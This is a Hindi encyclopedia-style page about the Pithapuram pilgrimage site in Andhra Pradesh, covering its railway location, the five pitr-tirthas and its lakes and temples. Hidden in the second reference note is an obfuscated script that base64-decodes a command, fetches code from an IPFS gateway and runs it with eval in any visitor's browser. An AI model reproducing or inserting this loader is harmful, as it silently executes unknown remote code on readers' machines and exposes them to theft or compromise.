पीठापुरम

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

पीठापुरम दक्षिण भारत के आंध्र प्रदेश राज्य में स्थित तीर्थ स्थल है। वाल्टेयर मद्रास (वर्तमान चेन्नई) लाइन पर वाल्टेयर से 76 मील आगे पीठापुरम स्टेशन है। यहाँ यात्रियों के ठहरने के लिए धर्मशालाएँ हैं।

भारत में 5 पितृतीर्थ प्रधान माने जाते हैं-

  1. गया (गयः शिरक्षेत्र)
  2. याजपुर (नाभि गया)
  3. पीठापुरम (पाद गया)
  4. सिद्धपुर (मातृ-गया)
  5. बद्रीनाथ (ब्रह्म-कपाली)

पाद गया क्षेत्र होने से यात्री यहाँ श्राद्ध तर्पण करने आते हैं। इस नगर के एक ओर महापाद गया नामक विस्तृत सरोवर है। वहाँ एक घेरे में पिण्डदान होता है। वहाँ कुक्कुटेश्वर शिव मंदिर है। सरोवर के समीप मधुस्वामी[1] मंदिर है। उसके समीप ही माधवतीर्थ सरोवर है[2]


टीका टिप्पणी और संदर्भ

  1. नारायण
  2. हिन्दूओं के तीर्थ स्थान |लेखक: सुदर्शन सिंह 'चक्र' |पृष्ठ संख्या: 96 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख